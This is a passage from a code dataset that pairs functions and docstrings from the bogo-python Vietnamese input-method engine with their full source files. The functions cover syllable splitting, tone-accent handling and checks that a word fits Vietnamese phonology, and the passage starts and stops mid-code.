comps = [first_consonant, vowel, last_consonant]
# 'gi' and 'qu' are considered qualified consonants.
# We want something like this:
# ['g', 'ia', ''] -> ['gi', 'a', '']
# ['q', 'ua', ''] -> ['qu', 'a', '']
if (comps[0] != '' and comps[1] != '') and \
((comps[0] in 'gG' and comps[1][0] in 'iI' and len(comps[1]) > 1) or
(comps[0] in 'qQ' and comps[1][0] in 'uU')):
comps[0] += comps[1][:1]
comps[1] = comps[1][1:]
return comps
|
BoGoEngine/bogo-python | bogo/utils.py | separate | python | def separate(string):
def atomic_separate(string, last_chars, last_is_vowel):
if string == "" or (last_is_vowel != is_vowel(string[-1])):
return (string, last_chars)
else:
return atomic_separate(string[:-1],
string[-1] + last_chars, last_is_vowel)
head, last_consonant = atomic_separate(string, "", False)
first_consonant, vowel = atomic_separate(head, "", True)
if last_consonant and not (vowel + first_consonant):
comps = [last_consonant, '', ''] # ['', '', b] -> ['b', '', '']
else:
comps = [first_consonant, vowel, last_consonant]
# 'gi' and 'qu' are considered qualified consonants.
# We want something like this:
# ['g', 'ia', ''] -> ['gi', 'a', '']
# ['q', 'ua', ''] -> ['qu', 'a', '']
if (comps[0] != '' and comps[1] != '') and \
((comps[0] in 'gG' and comps[1][0] in 'iI' and len(comps[1]) > 1) or
(comps[0] in 'qQ' and comps[1][0] in 'uU')):
comps[0] += comps[1][:1]
comps[1] = comps[1][1:]
return comps | Separate a string into smaller parts: first consonant (or head), vowel,
last consonant (if any).
>>> separate('tuong')
['t','uo','ng']
>>> separate('ohmyfkinggod')
['ohmyfkingg','o','d'] | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/utils.py#L96-L131 | [
"def atomic_separate(string, last_chars, last_is_vowel):\n if string == \"\" or (last_is_vowel != is_vowel(string[-1])):\n return (string, last_chars)\n else:\n return atomic_separate(string[:-1],\n string[-1] + last_chars, last_is_vowel)\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
VOWELS = "àáảãạaằắẳẵặăầấẩẫậâèéẻẽẹeềếểễệêìíỉĩịi" + \
"òóỏõọoồốổỗộôờớởỡợơùúủũụuừứửữựưỳýỷỹỵy"
def join(alist):
return "".join(alist)
def is_vowel(char):
char = char.lower()
return char in VOWELS
def change_case(string, case):
"""
Helper: Return new string obtained from change the given string to
desired case.
Args
string
case - 0: lower, 1: upper
"""
return string.upper() if case else string.lower()
def append_comps(comps, char):
"""
Append a character to `comps` following this rule: a vowel is added to the
vowel part if there is no last consonant, else to the last consonant part;
a consonant is added to the first consonant part if there is no vowel, and
to the last consonant part if the vowel part is not empty.
>>> transform(['', '', ''])
['c', '', '']
>>> transform(['c', '', ''], '+o')
['c', 'o', '']
>>> transform(['c', 'o', ''], '+n')
['c', 'o', 'n']
>>> transform(['c', 'o', 'n'], '+o')
['c', 'o', 'no']
"""
c = list(comps)
if is_vowel(char):
if not c[2]: pos = 1
else: pos = 2
else:
if not c[2] and not c[1]: pos = 0
else: pos = 2
c[pos] += char
return c
# def gibberish_split(head, tail=""):
# """
# Try to split a string into two parts: the alphabetic part at the end and the
# rest.
# >>> gibberish_split("aoeu")
# ("", "aoeu")
# >>> gibberish_split("ao.eu")
# ("ao.", "eu")
# >>> gibberish_split("aoeu.")
# ("aoeu.", "")
# """
# if head == "" or not head[-1].isalpha():
# return (head, tail)
# else:
# return gibberish_split(head[:-1], head[-1] + tail)
|
BoGoEngine/bogo-python | bogo/accent.py | get_accent_char | python | def get_accent_char(char):
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE | Get the accent of an single char, if any. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L45-L53 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_char(char, accent):
"""
Add accent to a single char. Parameter accent is member of class
Accent
"""
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case)
def add_accent_at(string, accent, index):
"""
Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused)
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
def remove_accent_string(string):
"""
Remove all accent from a whole string.
"""
return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | get_accent_string | python | def get_accent_string(string):
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE | Get the first accent from the right of a string. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L56-L62 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_char(char, accent):
"""
Add accent to a single char. Parameter accent is member of class
Accent
"""
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case)
def add_accent_at(string, accent, index):
"""
Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused)
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
def remove_accent_string(string):
"""
Remove all accent from a whole string.
"""
return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | add_accent | python | def add_accent(components, accent):
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]] | Add accent to the given components. The parameter components is
the result of function separate() | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L65-L89 | [
"def remove_accent_string(string):\n \"\"\"\n Remove all accent from a whole string.\n \"\"\"\n return utils.join([add_accent_char(c, Accent.NONE) for c in string])\n",
"def add_accent_char(char, accent):\n \"\"\"\n Add accent to a single char. Parameter accent is member of class\n Accent\n ... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent_char(char, accent):
"""
Add accent to a single char. Parameter accent is member of class
Accent
"""
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case)
def add_accent_at(string, accent, index):
"""
Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused)
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
def remove_accent_string(string):
"""
Remove all accent from a whole string.
"""
return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | add_accent_char | python | def add_accent_char(char, accent):
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case) | Add accent to a single char. Parameter accent is member of class
Accent | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L92-L105 | [
"def change_case(string, case):\n \"\"\"\n Helper: Return new string obtained from change the given string to\n desired case.\n\n Args\n string\n case - 0: lower, 1: upper\n \"\"\"\n return string.upper() if case else string.lower()\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_at(string, accent, index):
"""
Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused)
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
def remove_accent_string(string):
"""
Remove all accent from a whole string.
"""
return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | add_accent_at | python | def add_accent_at(string, accent, index):
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:] | Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused) | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L108-L119 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_char(char, accent):
    """Return *char* re-accented with *accent* (an Accent member).

    Non-vowel characters pass through unchanged; the original letter
    case is preserved.
    """
    if not char:
        return ""
    was_upper = char.isupper()
    lowered = char.lower()
    position = utils.VOWELS.find(lowered)
    if position != -1:
        # Jump to the accentless slot of this six-character vowel
        # family, then step back by the accent value.
        family_base = position - position % 6 + 5
        lowered = utils.VOWELS[family_base - accent]
    return utils.change_case(lowered, was_upper)
def remove_accent_char(char):
    """Return *char* stripped of any tone accent."""
    plain = add_accent_char(char, Accent.NONE)
    return plain
def remove_accent_string(string):
    """
    Return *string* with every tone accent removed.

    Each character is passed through add_accent_char() with
    Accent.NONE; non-vowel characters are left untouched.
    """
    return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | remove_accent_string | python | def remove_accent_string(string):
return utils.join([add_accent_char(c, Accent.NONE) for c in string]) | Remove all accent from a whole string. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L129-L133 | [
"def join(alist):\n return \"\".join(alist)\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_char(char, accent):
"""
Add accent to a single char. Parameter accent is member of class
Accent
"""
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case)
def add_accent_at(string, accent, index):
    """
    Add *accent* (an Accent member) to the index-th character of
    *string* and return the resulting string.

    An index of -1 means "no position" and returns the string
    unchanged.  (Currently unused.)
    """
    if index == -1:
        return string
    # BUG FIX: the original called ``accent.accent.add_accent_char``,
    # but ``accent`` here is a plain Accent value (an int) with no
    # such attribute, so the call could never succeed.  The intended
    # helper is the module-level add_accent_char().
    # NOTE(review): string[index] raises IndexError for an
    # out-of-range index — presumably callers pass a valid one.
    return string[:index] + \
        add_accent_char(string[index], accent) + \
        string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
|
BoGoEngine/bogo-python | bogo/validation.py | is_valid_sound_tuple | python | def is_valid_sound_tuple(sound_tuple, final_form=True):
# We only work with lower case
sound_tuple = SoundTuple._make([s.lower() for s in sound_tuple])
# Words with no vowel are always valid
# FIXME: This looks like it should be toggled by a config key.
if not sound_tuple.vowel:
result = True
elif final_form:
result = \
has_valid_consonants(sound_tuple) and \
has_valid_vowel(sound_tuple) and \
has_valid_accent(sound_tuple)
else:
result = \
has_valid_consonants(sound_tuple) and \
has_valid_vowel_non_final(sound_tuple)
return result | Check if a character combination complies to Vietnamese phonology.
The basic idea is that if one can pronunce a sound_tuple then it's valid.
Sound tuples containing consonants exclusively (almost always
abbreviations) are also valid.
Input:
sound_tuple - a SoundTuple
final_form - whether the tuple represents a complete word
Output:
True if the tuple seems to be Vietnamese, False otherwise. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/validation.py#L84-L115 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to check whether a word looks like Vietnamese
or not (i.e. can be pronounced by a Vietnamese speaker).
"""
from __future__ import unicode_literals
import collections
from bogo import accent, mark, utils
Accent = accent.Accent
# Auto-generated lists from dictionary
# FIXME:
# Think about words composed entirely of vowels, like 'yá'.
# Perhaps let the user customize these lists?
CONSONANTS = set([
'b', 'c', 'ch', 'd', 'g', 'gh', 'gi', 'h', 'k', 'kh', 'l', 'm', 'n', 'ng',
'ngh', 'nh', 'p', 'ph', 'qu', 'r', 's', 't', 'th', 'tr', 'v', 'x', 'đ'
])
TERMINAL_CONSONANTS = set([
'c', 'ch', 'm', 'n', 'ng', 'nh', 'p', 't'
])
VOWELS = set([
'a', 'ai', 'ao', 'au', 'ay', 'e', 'eo', 'i', 'ia', 'iu', 'iê', 'iêu',
'o', 'oa', 'oai', 'oao', 'oay', 'oe', 'oeo', 'oi', 'oo', 'oă', 'u', 'ua',
'ui', 'uy', 'uya', 'uyu', 'uyê', 'uâ', 'uây', 'uê', 'uô', 'uôi',
'uơ', 'y', 'yê', 'yêu', 'â', 'âu', 'ây', 'ê', 'êu', 'ô', 'ôi',
'ă', 'ơ', 'ơi', 'ư', 'ưa', 'ưi', 'ưu', 'ươ', 'ươi', 'ươu'
])
TERMINAL_VOWELS = set([
'ai', 'ao', 'au', 'ay', 'eo', 'ia', 'iu', 'iêu', 'oai', 'oao', 'oay',
'oeo', 'oi', 'ua', 'ui', 'uya', 'uyu', 'uây', 'uôi', 'uơ', 'yêu', 'âu',
'ây', 'êu', 'ôi', 'ơi', 'ưa', 'ưi', 'ưu', 'ươi', 'ươu'
])
STRIPPED_VOWELS = set(map(mark.strip, VOWELS))
# 'uo' may clash with 'ươ' and prevent typing 'thương'
# 'ua' may clash with 'uâ' and prevent typing 'luật'
STRIPPED_TERMINAL_VOWELS = set(map(mark.strip, TERMINAL_VOWELS)) - \
set(['uo', 'ua'])
SoundTuple = \
collections.namedtuple('SoundTuple',
['first_consonant', 'vowel', 'last_consonant'])
def is_valid_string(string, final_form=True):
    """Return True if *string* looks pronounceable as Vietnamese.

    The string is first split into (first consonant, vowel, last
    consonant) components by utils.separate().  With
    ``final_form=False`` the check is relaxed for words still being
    typed.
    """
    return is_valid_combination(utils.separate(string), final_form)
def is_valid_combination(comp, final_form=True):
    """Alias for is_valid_sound_tuple(); *comp* is a
    (first_consonant, vowel, last_consonant) triple.
    """
    return is_valid_sound_tuple(comp, final_form)
def has_valid_consonants(sound_tuple):
    """Check both consonant slots of *sound_tuple*.

    An empty slot is always acceptable; a non-empty one must appear
    in the corresponding whitelist (CONSONANTS for the initial,
    TERMINAL_CONSONANTS for the final).
    """
    first_ok = (sound_tuple.first_consonant == "" or
                sound_tuple.first_consonant in CONSONANTS)
    last_ok = (sound_tuple.last_consonant == "" or
               sound_tuple.last_consonant in TERMINAL_CONSONANTS)
    return first_ok and last_ok
def has_valid_vowel_non_final(sound_tuple):
    """Vowel check for a word that is still being typed.

    Only require that the (mark-stripped) vowel could eventually be
    completed into a legitimate one.  When a final consonant is
    already present, terminal-only vowels are excluded.
    """
    bare = mark.strip(sound_tuple.vowel)
    allowed = STRIPPED_VOWELS
    if sound_tuple.last_consonant != '':
        allowed = STRIPPED_VOWELS - STRIPPED_TERMINAL_VOWELS
    return bare in allowed
def has_valid_vowel(sound_tuple):
    """Validate the vowel nucleus of a complete word against the
    VOWELS/TERMINAL_VOWELS whitelists and spelling rules for final
    consonants.
    """
    # First remove all accents; the whitelists are accentless.
    vowel_wo_accent = accent.remove_accent_string(sound_tuple.vowel)
    def has_valid_vowel_form():
        # The vowel must be known, and a terminal-only vowel cannot be
        # followed by a final consonant.
        return vowel_wo_accent in VOWELS and not \
            (sound_tuple.last_consonant != '' and
                vowel_wo_accent in TERMINAL_VOWELS)
    def has_valid_ch_ending():
        # 'ch' can only go after a, ê, uê, i, uy, oa
        return not (sound_tuple.last_consonant == 'ch' and
                    not vowel_wo_accent in
                    ('a', 'ê', 'uê', 'i', 'uy', 'oa'))
    def has_valid_c_ending():
